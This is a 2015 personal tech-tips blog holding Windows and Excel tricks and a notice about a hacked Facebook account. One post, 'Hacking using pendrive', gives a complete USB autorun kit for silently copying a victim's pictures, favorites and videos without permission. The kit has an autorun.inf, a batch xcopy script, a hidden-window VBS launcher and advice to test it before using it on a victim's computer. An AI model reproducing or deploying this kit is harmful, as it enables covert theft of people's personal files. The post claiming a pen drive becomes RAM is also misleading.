Wednesday, 23 December 2015

how to enable ctrl+alt+del logon in windows 7

Dear All,
If you want to Enable Ctrl + Alt + Del to logon in window 7, then follow given step
  1. Press Window + R button (for Run Command)
  2. Write netplwiz in textbox and click ok button.
  3. Click the Advanced tab, select the Require users to press Ctrl+Alt+Delete check box, and then click OK.
Now Check your logon window it's change like you want.

Friday, 20 November 2015

Important Information about Facebook Profile

Dear All,
On the behalf of Jay kumar Mishra (Kamlesh Mishra), I want to give an important information, which is written below in his own words.
"Dear all,
My Facebook profile has been hacked from 19th-Nov-2015, 03:00 PM Approx. So please ignore the messages sent. I'll conform you when I retrieve my account.
Hacker call me from given below no detail.
Number: 8058080560
Company: Idea
Location: Rajasthan
Regards,
Jay kumar Mishra(Kamlesh Mishra)"
Dear friends, Please read this message and share it. thanks
Reards
Manish Chaturvedi
Admin of Manish chaturvedi blog

Tuesday, 6 October 2015

DATEDIF function to Calculate Difference of two Dates


Dear all,
Today we are going to share one excel Worksheet function named DATEDIF function, which is returns the difference between two date values. Using this formula we are going to find Age in Year, month and Day.

SYNTAX

 DATEDIF( start_date, end_date, interval )

Parameters

start_date and end_date : start_date and end_date is the two dates to calculate the difference between.

Interval

Interval
Explanation
Y
The number of complete years.
M
The number of complete months.
D
The number of complete days.
MD
The difference between the days (months and years are ignored).
YM
The difference between the months (days and years are ignored).
YD
The difference between the days (years and dates are ignored).

For Example:

Using this formula we are going to find Age in Year, month and Day.



Calculation for B3 that’s mean for Year

Simply formula is
                = DATEDIF(A3,TODAY(),"Y")
                =26
If we want to result like ‘26 Year’ then,
                = DATEDIF(A3,TODAY(),"Y")&"  Year"
                =26 Year
If we want to Result is ‘No DOB’, if A3 Cell is Blank then,
                =IF(A3=0,"No DOB",DATEDIF(A3,TODAY(),"Y")&"  Year")
                =26 Year

Calculation for C3 that’s mean for Month

Simply formula is
                = DATEDIF(A3,TODAY(),"YM")
                =4
If we want to result like ‘26 Year’ then,
                = DATEDIF(A3,TODAY(),"YM")&"  Month"
                =4 Month
If we want to Result is ‘No DOB’, if A3 Cell is Blank then,
                =IF(A3=0,"No DOB", DATEDIF(A3,TODAY(),"YM")&"  Month")
                =4 Month

Calculation for D3 that’s mean for Day

Simply formula is
                =DATEDIF(A3,TODAY(),"MD")
                =25
If we want to result like ‘26 Year’ then,
                =DATEDIF(A3,TODAY(),"MD")&"  Day"
                =25 Day
If we want to Result is ‘No DOB’, if A3 Cell is Blank then,
                =IF(A3=0,"No DOB",DATEDIF(A3,TODAY(),"MD")&"  Day")
                =25 Day

Idea is taken by Tech on The Net


Saturday, 22 August 2015

Make your Computer Welcome You

Hello Everyone,
  If you want Make your Computer Welcome You then, use this trick, follow the instructions given below:-


Steps
  1. Open Notepad.
  2. Copy and paste the exact code given below.  
  3. Dim speaks, speech speaks="Welcome to your PC, Username" Set speech=CreateObject("sapi.spvoice") speech.Speak speaks

  4. Replace Username with your own name.
  5.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
  6. Copy the saved file.
  7. Navigate to

    For Window XP: C:\Documents and Settings\All Users\Start Menu\Programs\Startup 

     and For Windows 8, Windows 7 and Windows Vista: C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

    if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.

  8.  Paste the file.
Now when the next time you start your computer, Windows will welcome you in its own computerized voice.

Make your Computer Talk

Hello Everyone,
  If you want to create one such talk script, follow the steps given below.


Steps
  1. Open Notepad.
  2. Copy and paste the exact code given below.  
  3. Dim Message, Speak Message=InputBox("Enter text","Speak") Set Speak=CreateObject("sapi.spvoice") Speak.Speak Message

  4. Click on File MenuSave As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
  5. Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.
That's it your Software for Speaking your Text to read.

   

Hacking using pendrive

This post is only to demonstrate how a user can steal victim's data without any permission, as soon as the flash drive is attached to computer, the files starts to copy in flash drive without any notice.

Process is very simple as we have to add only 4-5 notepad files in the flash drive.
Follow the following steps :-

1. Create a notepad file with name 
autorun.inf nad copy the following code.



[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
2. Create another notepad file of name file.bat and copy the following code.

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls
3. In our 3rd notepad file, copy the following code and save it as invisible.vbs


CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False

4. And in our last notepad file, copy this code and save the file as 
launch.bat


 wscript.exe \invisible.vbs file.bat

5. Now, copy all this 4 files in the root of  flash drive. And create a folder "all" where the content is to be copy.

6. Test this in your own computer first, before inserting this flash drive in victim's computer.


This code is writen by hacking using pendrive site click for more detail.

Want to Use Your Pen Drive As RAM ?

Hello Everyone,
If you want to use your Pen Drive as a RAM of your PC or Laptop then just use given below steps. 
  1. Insert the Pen Drive with 1GB at least in the USB Port, better to prefer 4GB.
  2. Right click on My Computer--> Properties--> Advanced system settings.
  3. Advanced--> Performance Settings.
  4. Advanced--> Change.
  5. Dis Select Automatically manage paging file size for all drives paging file size for each drive.
  6. Select your pen Drive (Suppose your pen drive is in G Drive Then Select G). 
  7. Click on Custom Size.  "Check the value of space available"
  8. Enter the same in the Initial and Max columns. "Here you just used the space of Pen Drive as a Virtual Memory".
  9. Now restart your PC.

Finally check the general start up time and also speed of your PC. So, you can have a high speed system in low cost.

Here Your pen drive is now a RAM you can Check your RAM Size using My Computer--> Properties Location.
That's it...

Friday, 14 August 2015

Recover my pen drive data which shows as empty

Hello Everyone,

Check if the files are not in hidden mode. 

Click on "Start" -->Run --> Type cmd and press Enter. 

Here I assume your pendrive drive letter as G: 

Enter this command. 

attrib -h -r -s /s /d g:\*.* --> Press Enter 

You can copy the above command --> Right-click in the Command Prompt and 

paste it. 

Note : Replace the letter g with your pen drive letter. 

Now check your pen drive for the files. 

Best of luck...

Monday, 25 May 2015

Restrict Desktop Wallpaper Change

Hello Everyone,
     If you Really want to restrict your Desktop wallpaper for any other user on your computer, Then go through the following step:

  1.  Click start --> Run . and type gpedit.msc and click ok
  2. Navigate to --> Configuration\Administrative Templates\Desktop\Active Desktop\Active Desktop Wallpaper [[Specifies the desktop background ("wallpaper") displayed on all users' desktops.]]
  3. Navigate to --> User Configuration\Administrative Templates\Control Panel|Display\Desktop
    Themes\Remove Theme Option [[If you enable this setting, it removes the Themes tab.]]

Saturday, 24 January 2015

Screen Recorder with Audio and Video

Hello Everyone,
        Want to any idea about Record your Computer Desktop work with audio and your face, then just use this step.
Step 1: Go to bbflashbackexpress Website and follow the step.
or
Download this from given link.
Its free..


Thanks....

Search on This Blog